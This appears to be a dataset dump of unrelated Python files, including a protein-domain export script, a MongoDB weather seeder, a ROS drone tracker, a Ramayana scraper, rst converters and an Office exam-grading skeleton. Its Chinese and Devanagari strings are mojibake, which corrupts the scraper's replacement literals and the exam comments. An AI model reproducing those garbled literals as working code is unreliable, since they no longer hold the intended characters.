for j in range(i+1, len(doms)):
dom_key = ', '.join(sorted([doms[i],doms[j]]))
try:
lkp[dom_key] += count
except KeyError:
lkp[dom_key] = count
out = open('%s.tab' % path ,'w')
out.write('dom_1\tdom_2\tcount\n')
for link in lkp.keys():
doms = str(link).split(', ')
out.write("%s\t%s\t%s\n"%(doms[0], doms[1], lkp[link]))
out.close()
#-----------------------------------------------------------------------------------------------------------------------
def export_attribs(arch_lkp, valid_doms, path):
'''Write out network file.
Inputs:
arch_lkp -- dictionary of multi-domain architectures.
'''
out = open('%s.tab' % path ,'w')
out.write('dom\tvalid\n')
lkp = {}
for arch in arch_lkp.keys():
doms = arch.split(', ')
if len(doms) <= 1:
continue
for dom in doms:
valid = False
if dom in valid_doms:
valid = True
lkp[dom] = valid
for it in lkp.items():
out.write("%s\t%s\n"%(it[0], it[1]))
out.close()
#-----------------------------------------------------------------------------------------------------------------------
def export_doms(dom_lkp, valid_doms, path):
'''Write out identified architectures in markdown tables.
Inputs:
dom_lkp -- dictionary of domains occuring in multi-domain architectures.
'''
sorted_doms = sorted(dom_lkp.iteritems(), key=operator.itemgetter(1), reverse= True)
out = open('%s.md' % path ,'w')
out.write('|domain |count| validated|\n')
out.write('|:-----------|:-----|-------:|\n')
for dom in sorted_doms:
mapped = False
count = dom[1]
dom = str(dom[0])
if dom in valid_doms:
mapped = True
out.write("|%s|%s|%s|\n"%(dom, count, mapped))
#-----------------------------------------------------------------------------------------------------------------------
def master(version):
"""
Function: master
Run through all steps to identify mandatory muli-domain architectures.
"""
# Load the list of validated domains.
valid_dom_d = readfile('data/valid_pfam_v_%(version)s.tab' % locals(), 'pfam_a', 'pfam_a')
valid_doms = valid_dom_d.keys()
## Load eligible targets.
el_targets = get_el_targets(params)
## Get domains for tids.
pfam_lkp = get_doms([x[0] for x in el_targets], params)
## Add targets with given architecture.
(arch_lkp, dom_lkp, act_lkp) = get_archs(el_targets, pfam_lkp)
## Count covered acrchitectures.
count_valid(arch_lkp, valid_doms)
## Count covered activities.
count_valid(act_lkp, valid_doms)
## Write multi-domain architechtures to markdown tables.
export_archs(arch_lkp, valid_doms, 'data/multi_dom_archs_%s'% params['release'])
## Write domains from multi-domain architechtures to markdown tables.
export_doms(dom_lkp, valid_doms, 'data/multi_dom_doms_%s'% params['release'])
## export network file.
export_network(arch_lkp, valid_doms, 'data/multi_dom_network_%s'% params['release'])
## export network attribute file.
export_attribs(arch_lkp, valid_doms, 'data/multi_dom_attributes_%s'% params['release'])
#-----------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
import sys
if len(sys.argv) != 2: # the program name and one argument
sys.exit("""Parameters are read from mpf.yaml but must specify
version for data/valid_pfam_v_%(version)s.tab""")
version = sys.argv[1]
master(version)
|
458 | 51af54c55834c4bdb8e1cbe4ac55b86bdc61bf4d | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.utils.timezone import utc
import datetime
class Migration(migrations.Migration):
dependencies = [
('notesapp', '0008_auto_20150819_1222'),
]
operations = [
migrations.RenameField(
model_name='note',
old_name='txtcolor',
new_name='text',
),
migrations.AlterField(
model_name='note',
name='created_date',
field=models.DateTimeField(default=datetime.datetime(2015, 8, 19, 12, 25, 8, 579538, tzinfo=utc), editable=False),
),
]
|
459 | a8b1b218e6649545000803c91c803580cfdbd4f1 | import random
# Imports MongoClient for base level access to the local MongoDB
from pymongo import MongoClient
# Imports datetime class to create timestamp for weather data storage
from datetime import datetime
# Importing DailyReportModel class to use the implemented method to insert data into daily_report_model collection
from model import DailyReportModel
# Database host ip and port information
HOST = '127.0.0.1'
PORT = '27017'
RELATIVE_CONFIG_PATH = '../config/'
DB_NAME = 'weather_db'
USER_COLLECTION = 'users'
DEVICE_COLLECTION = 'devices'
WEATHER_DATA_COLLECTION = 'weather_data'
DAILY_REPORT_MODEL = 'daily_report_model'
# This will initiate connection to the mongodb
db_handle = MongoClient(f'mongodb://{HOST}:{PORT}')
# We drop the existing database including all the collections and data
db_handle.drop_database(DB_NAME)
# We recreate the database with the same name
weather_dbh = db_handle[DB_NAME]
# user data import
# User document contains username (String), email (String), and role (String) fields
# Reads users.csv one line at a time, splits them into the data fields and inserts
with open(RELATIVE_CONFIG_PATH+USER_COLLECTION+'.csv', 'r') as user_fh:
for user_row in user_fh:
user_row = user_row.rstrip()
if user_row:
(username, email, role) = user_row.split(',')
user_data = {'username': username, 'email': email, 'role': role}
# This creates and return a pointer to the users collection
user_collection = weather_dbh[USER_COLLECTION]
# This inserts the data item as a document in the user collection
user_collection.insert_one(user_data)
# device data import
# Device document contains device_id (String), desc (String), type (String - temperature/humidity) and manufacturer (String) fields
# Reads devices.csv one line at a time, splits them into the data fields and inserts
with open(RELATIVE_CONFIG_PATH+DEVICE_COLLECTION+'.csv', 'r') as device_fh:
for device_row in device_fh:
device_row = device_row.rstrip()
if device_row:
(device_id, desc, type, manufacturer) = device_row.split(',')
device_data = {'device_id': device_id, 'desc': desc, 'type': type, 'manufacturer': manufacturer}
# This creates and return a pointer to the devices collection
device_collection = weather_dbh[DEVICE_COLLECTION]
# This inserts the data item as a document in the devices collection
device_collection.insert_one(device_data)
# weather data generation
# Weather data document contains device_id (String), value (Integer), and timestamp (Date) fields
# Reads devices.csv one line at a time to get device id and type. It then loops for five days (2020-12-01 to 2020-12-05
# For each device and day, it creates random values for each hour (at the 30 minute mark) and stores the data
#Created a list to populate it with device id and timestamp
devdaylist = []
with open(RELATIVE_CONFIG_PATH+DEVICE_COLLECTION+'.csv', 'r') as device_fh:
for device_row in device_fh:
device_row = device_row.rstrip()
if device_row:
# _ can be used to ignore values that are not needed
(device_id, _, type, _) = device_row.split(',')
for day in range(1,6):
#creating and appending data to the list
day1 = datetime(2020, 12, day)
devdaylist.append((device_id, day1))
for hour in range(0,24):
timestamp = datetime(2020, 12, day, hour, 30, 0)
# Generates random data value in appropriate range as per the type of sensor (normal bell-curve distribution)
if (type.lower() == 'temperature'):
value = int(random.normalvariate(24,2.2))
elif (type.lower() == 'humidity'):
value = int(random.normalvariate(45,3))
weather_data = {'device_id': device_id, 'value': value, 'timestamp': timestamp}
weather_data_collection = weather_dbh[WEATHER_DATA_COLLECTION]
# This inserts the data item as a document in the weather_data collection
weather_data_collection.insert_one(weather_data)
#Populating the data to daily_report_model collection on setup
drm = DailyReportModel()
for ddy in devdaylist:
drm.insert_daily_report_to_daily_report_model(ddy[0], ddy[1], 'admin')
|
460 | 8cd582915c5abd96a4ef8a3a5309311f2a73a156 |
with open("file.txt", 'r') as fh:
data = fh.readline()
lis= data.split(' ')
my_dict={}
for key in lis:
if key in my_dict.keys():
my_dict[key] += 1
else:
my_dict[key] = 1
print(my_dict)
|
461 | f55b286448f114f3823f099a576af7bec1780a8c | # -*- coding: utf-8 -*-
try:
from greenlet import getcurrent as get_current_greenlet
except ImportError:
get_current_greenlet = int
from thread import get_ident as get_current_thread
from threading import Lock
if get_current_greenlet is int: # Use thread
get_ident = get_current_thread
else: # Use greenlet
get_ident = lambda: (get_current_thread(), get_current_greenlet())
class Local(object):
__slots__ = ('__data__', '__lock__')
def __init__(self):
object.__setattr__(self, '__data__', {})
object.__setattr__(self, '__lock__', Lock())
def __iter__(self):
return self.__data__.iteritems()
def __getattr__(self, item):
self.__lock__.acquire()
try:
try:
return self.__data__[get_ident()][item]
except KeyError:
raise AttributeError(item)
finally:
self.__lock__.release()
def __setattr__(self, key, value):
self.__lock__.acquire()
try:
_id = get_ident()
data = self.__data__
if _id in data:
data[_id][key] = value
else:
data[_id] = {key: value}
finally:
self.__lock__.release()
def __delattr__(self, item):
self.__lock__.acquire()
try:
try:
del self.__data__[get_ident()][item]
except KeyError:
raise AttributeError(item)
finally:
self.__lock__.release()
def __release__(self):
self.__data__.pop(get_ident(), None)
class LocalStack(object):
def __init__(self):
self._local = Local()
self._lock = Lock()
def push(self, obj):
self._lock.acquire()
try:
rv = getattr(self._local, 'stack', None)
if rv is None:
self._local.stack = rv = []
rv.append(obj)
return rv
finally:
self._lock.release()
def pop(self):
self._lock.acquire()
try:
stack = getattr(self._local, 'stack', None)
if stack is None:
return None
elif len(stack) == 1:
self._local.__release__()
return stack[-1]
else:
stack.pop()
finally:
self._lock.release()
@property
def top(self):
try:
return self._local.stack[-1]
except (AttributeError, IndexError):
return None
|
462 | e864dad3f46fc9c6c472823bd06ce74fb5cb3f41 | #!/usr/bin/env python
import rospy
import cv2
import numpy as np
from cv_bridge import CvBridge
from matplotlib import pyplot as plt
from sensor_msgs.msg import Image
from drone_app_msgs.msg import BBox, Drone, DroneArray
from rospy.numpy_msg import numpy_msg
# ---------------------------------------
# This is an implementation of a simple CV
# algorithm that can be used for testing
# --- Global variables initialization ---
pub = None
# ---------------------------------------
def processFrame(image_message):
# --- Convert from ROS to OpenCV
frame = CvBridge().imgmsg_to_cv2(image_message)
# --- Threshold the image and find a mask
frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(frame_hsv, (0, 0, 0, 0), (180, 255, 30, 0))
mask = cv2.dilate(mask, None, iterations=1)
# --- Find contours in the mask and initialize the current
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2]
center = None
c = max(cnts, key=cv2.contourArea)
x,y,w,h = cv2.boundingRect(c)
# --- Pack in the message
msg = DroneArray()
drone = Drone()
drone.id = -1
drone.name = 'parrot_bebop2'
drone.box.t.linear.x = x * 100 / 640
drone.box.t.linear.y = y * 100 / 480
drone.box.w = w * 100 / 640
drone.box.h = h * 100 / 480
msg.drones.append(drone)
pub.publish(msg)
if __name__ == '__main__' :
# --- Topics
rospy.init_node('gazeboTracking', anonymous=True)
rospy.Subscriber('camera_img', Image, processFrame)
pub = rospy.Publisher('fixed_drones', DroneArray, queue_size=10)
rospy.spin()
|
463 | f3a63a22f8746d4a1f127bfe9e8c9d822109ab3c | import logging
import os
import textwrap
from urllib.request import urlopen
from bs4 import BeautifulSoup
from tqdm import tqdm
from doc_curation import book_data
from doc_curation.md import get_md_with_pandoc
from doc_curation.md.file import MdFile
from doc_curation.scraping.misc_sites import iitk
from doc_curation.scraping.html_scraper import souper
from indic_transliteration import sanscript
# Remove all handlers associated with the root logger object.
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
logging.basicConfig(
level=logging.DEBUG,
format="%(levelname)s:%(asctime)s:%(module)s:%(lineno)d %(message)s")
unit_info_file = os.path.join(os.path.dirname(book_data.__file__), "data/book_data/raamaayanam/andhra.json")
def dump_sarga(url, out_path, sarga_id, dry_run=False):
# browser.implicitly_wait(2)
page_html = urlopen(url)
soup = BeautifulSoup(page_html.read(), 'lxml')
shloka_tags = soup.select(".views-row")
sarga_content = ""
for (index, shloka_tag) in enumerate(tqdm(shloka_tags)):
fields = shloka_tag.select(".field-content")
if index == 0:
sarga_summary = fields[0].contents[0].replace("[", "").replace("]", "")
shloka = souper.get_md_paragraph(fields[0].contents[1:])
sarga_content = get_md_with_pandoc(content_in=sarga_summary, source_format="html")
else:
shloka = souper.get_md_paragraph(fields[0].contents)
shloka = shloka.replace(":", "เค")
word_meaning = souper.get_md_paragraph(fields[1].contents).replace(":", "เค")
shloka_meaning = souper.get_md_paragraph(fields[2].contents)
content = textwrap.dedent("""
## เคถเฅเคฒเฅเคเค
### เคฎเฅเคฒเคฎเฅ
%s
### เคถเคฌเฅเคฆเคพเคฐเฅเคฅเค
%s
### เคเคเฅเคเฅเคฒเคพเคจเฅเคตเคพเคฆเค
%s
""") % (shloka, word_meaning, shloka_meaning)
sarga_content = "%s\n\n%s" % (sarga_content, content)
md_file = MdFile(file_path=out_path)
sarga_content = sarga_content.replace(":", "เค").replace("เคเคคเฅเคฏเคพเคฐเฅเคทเฅ", "\n## เคธเคฎเคพเคชเฅเคคเคฟเค\n")
md_file.dump_to_file(metadata={"title": "%03d" % sarga_id}, content=sarga_content, dry_run=dry_run)
def dump_all_sargas(base_dir):
for kaanda_index in book_data.get_subunit_list(file_path=unit_info_file, unit_path_list=[]):
if kaanda_index >= 6:
continue
sarga_list = book_data.get_subunit_list(file_path=unit_info_file, unit_path_list=[kaanda_index])
for sarga_index in sarga_list:
logging.info("Kanda %d Sarga %d", kaanda_index, sarga_index)
out_path = os.path.join(base_dir, "%d" % kaanda_index, "%03d.md" % sarga_index)
url = "https://www.valmiki.iitk.ac.in/sloka?field_kanda_tid=%d&language=dv&field_sarga_value=%d" % (
kaanda_index, sarga_index)
dump_sarga(url=url, out_path=out_path, sarga_id=sarga_index)
def dump_all_sargas(base_dir):
for kaanda_index in book_data.get_subunit_list(file_path=unit_info_file, unit_path_list=[]):
if kaanda_index >= 6:
continue
sarga_list = book_data.get_subunit_list(file_path=unit_info_file, unit_path_list=[kaanda_index])
for sarga_index in sarga_list:
logging.info("Kanda %d Sarga %d", kaanda_index, sarga_index)
out_path = os.path.join(base_dir, "%d" % kaanda_index, "%03d.md" % sarga_index)
url = "https://www.valmiki.iitk.ac.in/sloka?field_kanda_tid=%d&language=dv&field_sarga_value=%d" % (
kaanda_index, sarga_index)
dump_sarga(url=url, out_path=out_path, sarga_id=sarga_index)
def dump_commentary(base_dir, commentary_id):
for kaanda_index in book_data.get_subunit_list(file_path=unit_info_file, unit_path_list=[]):
if kaanda_index >= 6:
continue
sarga_list = book_data.get_subunit_list(file_path=unit_info_file, unit_path_list=[kaanda_index])
for sarga_index in sarga_list:
logging.info("Kanda %d Sarga %d", kaanda_index, sarga_index)
out_path = os.path.join(base_dir, "%d" % kaanda_index, "%03d.md" % sarga_index)
url = "https://www.valmiki.iitk.ac.in/commentaries?language=dv&field_commnetary_tid=%d&field_kanda_tid=%d&field_sarga_value=%d" % (
commentary_id, kaanda_index, sarga_index)
title_maker = lambda soup, title_prefix: sanscript.transliterate("%03d" % sarga_index, sanscript.IAST,
sanscript.DEVANAGARI)
iitk.dump_item(item_url=url, outfile_path=out_path, title_maker=title_maker)
if __name__ == '__main__':
pass
# dump_all_sargas(base_dir="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/Andhra-pAThaH_iitk/")
# aandhra.fix_title_names(base_dir="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/kumbhakona", base_dir_ref="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/goraxapuram/VR_with_errors", dry_run=False)
# dump_commentary(base_dir="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/TIkA/bhUShaNa_iitk/", commentary_id=14)
# dump_commentary(base_dir="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/TIkA/shiromaNI_iitk/", commentary_id=10)
# dump_commentary(base_dir="/home/vvasuki/sanskrit/raw_etexts/purANam/rAmAyaNam/TIkA/tilaka_iitk/", commentary_id=13)
|
464 | 90bb70b0a97c7872c8581a176ebacc50df8e1f72 | import datetime
def year_choices():
return [(r,r) for r in range(1984, datetime.date.today().year + 1)]
def current_year():
return datetime.date.today().year
|
465 | d1b2420778e788d78be2a12a27c80f5fa1b15a0f | import functools
import re
from pprint import pprint
def heading(*, marker=''):
'''
Add a new line with the same number of heading markers as the characters in the title
Need to specify marker to one of the valid rst line markups
'''
def wrapper_heading(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
title = func(*args, **kwargs)
class_obj, passed_title, = args
title = title.strip()
return f'\n{title}\n{marker*len(title)}\n' if passed_title.strip() != title else passed_title
return wrapper
return wrapper_heading
def code_pre_block(func):
'''
formats a code block according to rst format
'''
@functools.wraps(func)
def wrapper(*args, **kwargs):
block = func(*args, **kwargs)
new_block = '\n.. code-block::\n\n'
for line in block.split('\n'):
new_block += f' {line}\n'
return new_block
return wrapper
def source_block(func):
'''
formats code from <source lang="some_language"> blocks
where the language is optional
'''
@functools.wraps(func)
def wrapper(*args, **kwargs):
lang, block = func(*args, **kwargs)
new_block = f'\n\n.. code-block:: {lang or ""}\n\n'
for line in block.split('\n'):
new_block += f' {line}\n'
return new_block
return wrapper
def list_block(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
items = func(*args, **kwargs)
new_list = '\n'
prev_indent = 0
sub_list_started = False
for line in items.split('\n'):
num_markers = get_num_markers(line) # how many # there are
indent_by = (num_markers - 1) * 2 # no indentation for first level
def get_printable_part(string):
'''
trim out up to a colon or semi-colon after a # list marker
'''
return string[num_markers+1:].strip() if string[num_markers] in [':', ';', '*'] else string[num_markers:].strip()
# if # is followed by ; or :, it is a continuation of the previous list item
# this can just be indented
if line[num_markers] == '*': # bullet list item
if not sub_list_started:
new_list += f'\n{" " * num_markers*2}* {get_printable_part(line)}\n'
sub_list_started = True
else:
new_list += f'{" " * num_markers*2}* {get_printable_part(line)}\n'
continue
sub_list_started = False
if line[num_markers] in [':', ';']:
line = f'{" " * num_markers*2}{get_printable_part(line)}'
else:
line = f'{" " * indent_by}* {get_printable_part(line)}'
if indent_by != prev_indent: # starting a new level or going back to old level
line = f'\n{line}' # new level starts a new line
prev_indent = indent_by
new_list += f'{line}\n'
return new_list
return wrapper
def get_num_markers(string):
indent_by = 0
for i in range(len(string)):
if string[i] == '#':
indent_by += 1
else:
break
return indent_by
@list_block
def list_block_converter(match_group):
return match_group.group(1)
@code_pre_block
def code_pre_block_converter(match_group):
return match_group.group(2)
@source_block
def source_block_converter(match_group):
'''
formats a code block from <source lang="some_language">
the language part is optional
'''
return (match_group.group(1), match_group.group(2))
if __name__ == '__main__':
pass |
466 | 29bee4ef11281380aa05d22ef54cb76502ecd685 | from enum import Enum
class CellState(Enum):
EMPTY = 1
DEAD = 2
ALIVE = 3
WAS_ALIVE = 4
def __str__(self):
default_str = super(CellState, self).__str__()
if default_str == "CellState.EMPTY":
return "E"
elif default_str == "CellState.DEAD":
return "D"
elif default_str == "CellState.ALIVE":
return "A"
elif default_str == "CellState.WAS_ALIVE":
return "W"
else:
return "?"
|
467 | b453006b4d4c5f17bb58110fe8197d7796ca0c6c | # -*- coding: utf-8 -*-
__author__ = 'tqs'
from win32com.client import Dispatch
import win32com.client
import time
import os
import re
import win32api
'''
windowsๆไฝ้จๅ่ฏดๆ๏ผ
่่ฏๆณขๅ็ฅ่ฏ็น๏ผ
1.ๅ ้คๆไปถๅๆไปถๅคน
2.ๅคๅถๆไปถๅๆไปถๅคน
3.็งปๅจๆไปถๅๆไปถๅคน
4.ๆไปถๅๆไปถๅคนๆนๅ
5.ๆไปถๅฑๆง
่่ฏๆ ทไพ๏ผ
1ใๅจโ่จ็ฑปๆค็ฉโๆไปถๅคนไธญ๏ผๆฐๅปบไธไธชๅญๆไปถๅคนโ่ๅ่จ็ฑปโใ
2ใๅฐๆไปถโๆทกๆฐด่ป.dddโ็งปๅจๅฐโ่ป็ฑปๆค็ฉโๆไปถๅคนไธญใ
3ใ่ฎพ็ฝฎโ่บๆ่ป.aaaโๆไปถๅฑๆงไธบโๅช่ฏปโใ
4ใๅจๆก้ขไธๅปบ็ซโ็ปฟ่ฒๆค็ฉโ็ๅฟซๆทๆนๅผใ
'''
class WinOperation:
def __init__(self):
self.soucePath = ''
self.destPath = ''
self.destFilename = ''
self.sourceFilename = ''
def dele(self,destFilename):#ๅ ้คๆไปถๅๆไปถๅคน
print('ๅ ้คๆไปถ',destFilename)
pass
def rename(self,sourceFilename,destFilename):#ๆไปถๆนๅ
print(sourceFilename,'ๆไปถๆนๅไธบ',destFilename)
pass
def mov(self,sourceFilename,destFilename):#็งปๅจๆไปถ
print(sourceFilename,'็งปๅจๆไปถไธบ',destFilename)
pass
def copy(self,sourceFilename,destFilename):#ๅคๅถๆไปถ
print(sourceFilename,'็งปๅจๆไปถไธบ',destFilename)
pass
def prop(self,destFilename):#ๆไปถๅฑๆง
print('ๆไปถๅฑๆง',destFilename)
pass
def realSourceFilename(self,soucePath,sourceFilename):
return sourceFilename
def realdestFilename(self,destPath,destFilename):
return destFilename
def judgeNew(self,OperStr):#ไปๆๆฌไธญๅคๆญๆฐๅปบๆไปถๆๆไปถๅคน
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
pass
def judgeDele(self,OperStr):#ไปๆๆฌไธญๅคๆญๅ ้คๆไปถ
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
pass
def judgeRename(self,OperStr):#ไปๆๆฌไธญๅคๆญ้ๅฝๅๆไปถ
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
pass
def judgeMov(self,OperStr):#ไปๆๆฌไธญๅคๆญ็งปๅจๆไปถ
#ๅฝขๅฆๅฐๆไปถโๆทกๆฐด่ป.dddโ็งปๅจๅฐโ่ป็ฑปๆค็ฉโๆไปถๅคนไธญใ่ฟ็ง็ปๆ็่งฃๆ
#่งฃๆไธบๆบๆไปถ๏ผ็ฎๆ ๆไปถ
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
#้่ฆๅๅๅพๅฎๆด่ทฏๅพ๏ผ้่ฆๆฅๆพ
sourceFilename=self.realSourceFilename("d:\zrexam\windows",source)
destFilename=self.realdestFilename("d:\zrexam\windows",dest)
self.mov(sourceFilename,destFilename)
def judgeCopy(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
pass
def judgeProp(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
pattern = re.compile('โ(.*)โ')
print (pattern.findall(OperStr))
strFile=str(pattern.findall(OperStr))
file1=strFile.split("โ")
source=file1[0][2:]#่ทๅพๆบๆไปถ
print(source)
file2=strFile.split("โ")
dest=file2[1][0:-2]#่ทๅพ็ฎๆ ๆไปถ
print(dest)
## win32api.SetFileAttributes(fileName,win32con.FILE_ATTRIBUTE_HIDDEN)
## win32api.SetFileAttributes(fileName,win32con.FILE_ATTRIBUTE_NORMAL)
pass
def judgeOperFromList(self,OperStrList):#ๆ นๆฎๅๅฐ้ข้ๆฉๅฏนๅบ็ๆไฝ
for item in OperStrList:
pass
def getOperStrListFromFile(self,filename):#ไปๆไปถไธญๅฐๅๅฐ้ขๆพๅ
ฅๅ่กจ
pass
def judgeOperFromStr(self,OperStr):#ๆ นๆฎๅฐ้ขๆๆฌ้ๆฉๅฏนๅบ็ๆไฝ
if OperStr.find("ๆฐๅปบ") !=-1:
print("่ฟๅ
ฅๆฐๅปบๆไฝ")
self.judgeNew(OperStr)
print("็ปๆๆฐๅปบๆไฝ")
if OperStr.find("ๅ ้ค") !=-1:
print("่ฟๅ
ฅๅ ้คๆไฝ")
self.judgeDele(OperStr)
print("็ปๆๅ ้คๆไฝ")
if OperStr.find("ๅคๅถ") !=-1:
print("่ฟๅ
ฅๅคๅถๆไฝ")
self.judgeCopy(OperStr)
print("็ปๆๅคๅถๆไฝ")
if OperStr.find("็งปๅจ") !=-1:
print("่ฟๅ
ฅ็งปๅจๆไฝ")
self.judgeMov(OperStr)
print("็ปๆ็งปๅจๆไฝ")
if OperStr.find("ๆนๅ") !=-1:
print("่ฟๅ
ฅๆนๅๆไฝ")
self.judgeRename(OperStr)
print("็ปๆๆนๅๆไฝ")
if OperStr.find("ๅฑๆง") !=-1:
print("่ฟๅ
ฅๅฑๆงๆไฝ")
self.judgeProp(OperStr)
print("็ปๆๅฑๆงๆไฝ")
'''
wordๆไฝ้จๅ่ฏดๆ๏ผ
่่ฏๆณขๅ็ฅ่ฏ็น๏ผ
1.ๅญไฝ
2.ๆฎต่ฝ
3.ๆฅๆพๆฟๆข
4.ๆๅ
ฅ ่กจๆ ผ๏ผ่บๆฏๅญ๏ผๅพ็
5.้กต่พน่ท๏ผๅๆ
1. ๅฐๆ ้ขโๅธๆฉ้พๅฟโ่ฎพ็ฝฎไธบ้ปไฝ๏ผๅฑ
ไธญๅฏน้ฝใ
2๏ผๅฐๆไธญ็ฌฌไบๆฎต๏ผ่ฟไธชๅฐๅญฆ่ฎพๅจไธๅบงๅบๅ
โฆโฆ๏ผ่ฎพ็ฝฎไธบ้ฆ่ก็ผฉ่ฟ2ๅญ็ฌฆใ
3๏ผๅฐๆไธญๆๆ็โ็ฐ่ๅธโๆฟๆขไธบโ็ฐๅ
็โใ
4. ่ฎพ็ฝฎ้กต่พน่ทไธบไธไธๅ2.5ๅ็ฑณ๏ผๅบ็จไบๆด็ฏๆๆกฃ๏ผใ
5. ๅจๆญฃๆไธ้ข็็ฉบ็ฝๅคๆๅ
ฅ่บๆฏๅญ๏ผๅ
ๅฎนไธบโๅธๆฉ้พๅฟโ๏ผๆ ทๅผไปป้๏ผใ
่่ฏๆ ทไพ๏ผ
'''
class WordOperation:
def __init__(self, filename=None): #ๆๅผๆไปถๆ่
ๆฐๅปบๆไปถ๏ผๅฆๆไธๅญๅจ็่ฏ๏ผ
self.wordApp = win32com.client.Dispatch('Word.Application')
if filename:
self.filename = filename
else:
self.filename = ''
def save(self, newfilename=None): #ไฟๅญๆไปถ
if newfilename:
self.filename = newfilename
else:
pass
def close(self): #ๅ
ณ้ญๆไปถ
del self.wordApp
def fontOper(self):
pass
def replaceOper(self,source,dest):
pass
def insertOper(self,style):
pass
def pageOper(self):
pass
def paragraphOper(self):
pass
def judgePage(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeFont(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeReplace(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeInsert(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeParagraph(self,OperStr):
print('ๆญฃๅจๅฎๆ่ฆๆฑ',OperStr)
def judgeOperFromStr(self,OperStr):#ๆ นๆฎๅฐ้ขๆๆฌ้ๆฉๅฏนๅบ็ๆไฝ
if OperStr.find("ๆ ้ข") !=-1 or OperStr.find("้ปไฝ") !=-1 or OperStr.find("ๅฑ
ไธญๅฏน้ฝ") !=-1:
print("่ฟๅ
ฅๅญไฝๆไฝ")
self.judgeFont(OperStr)
print("็ปๆๅญไฝ")
elif OperStr.find("้ฆ่ก็ผฉ่ฟ") !=-1 or OperStr.find("่ก่ท") !=-1:
print("่ฟๅ
ฅๆฎต่ฝๆไฝ")
self.judgeParagraph(OperStr)
print("็ปๆๆฎต่ฝๆไฝ")
elif OperStr.find("ๆๅ
ฅ") !=-1:
print("่ฟๅ
ฅๆๅ
ฅๆไฝ")
self.judgeInsert(OperStr)
print("็ปๆๆๅ
ฅๆไฝ")
elif OperStr.find("้กต่พน่ท") !=-1:
print("่ฟๅ
ฅ้กต่พน่ทๆไฝ")
self.judgePage(OperStr)
print("็ปๆ้กต่พน่ทๆไฝ")
elif OperStr.find("ๅๆ ") !=-1:
print("่ฟๅ
ฅๅๆ ๆไฝ")
self.judgeFont(OperStr)
print("็ปๆๅๆ ๆไฝ")
elif OperStr.find("ๆฟๆข") !=-1:
print("่ฟๅ
ฅๆฟๆขๆไฝ")
self.judgeReplace(OperStr)
print("็ปๆๆฟๆขๆไฝ")
'''
Excelๆไฝ้จๅ่ฏดๆ๏ผ
่่ฏๆณขๅ็ฅ่ฏ็น๏ผ
1.่ก้ซๅๅฎฝ
2.ๆ ผๅผ็ธๅ
ณ
3.ๅ
ฌๅผๅฝๆฐ
4.ๆๅบ
5.ๆๅ
ฅๅพ่กจ
่่ฏๆ ทไพ๏ผ
1.ๅฐA2ๆๅจ่ก็่ก้ซ่ฎพ็ฝฎไธบ30๏ผ40ๅ็ด ๏ผใ
2.ๆ นๆฎๅทฅไฝ่กจไธญๆไพ็ๅ
ฌๅผ๏ผ่ฎก็ฎๅ็ญ็บง็โ3D็คพๅขๅไธๆฏไพโ๏ผๅนถๅฐ็ปๆๅกซๅๅจF3:F7ๅๅ
ๆ ผๅ
ใ
3.็ปA2:F8ๅๅ
ๆ ผๅบๅๅ ๆๆๆก็บฟใ
4.ๆโๆ ไบบๆบ็คพๅขไบบๆฐโ็ฑ้ซๅฐไฝๆๅบใ
5.้ๅฎA2:B7ๅๅ
ๆ ผๅบๅ๏ผๅถไฝโไธ็ปดๆ็บฟๅพโ๏ผๅนถๆๅ
ฅๅฐSheet1ๅทฅไฝ่กจไธญใ
'''
class ExcelOperation:
def __init__(self, filename=None): #ๆๅผๆไปถๆ่
ๆฐๅปบๆไปถ๏ผๅฆๆไธๅญๅจ็่ฏ๏ผ
self.xlApp = win32com.client.Dispatch('Excel.Application')
if filename:
self.filename = filename
self.xlBook = self.xlApp.Workbooks.Open(filename)
else:
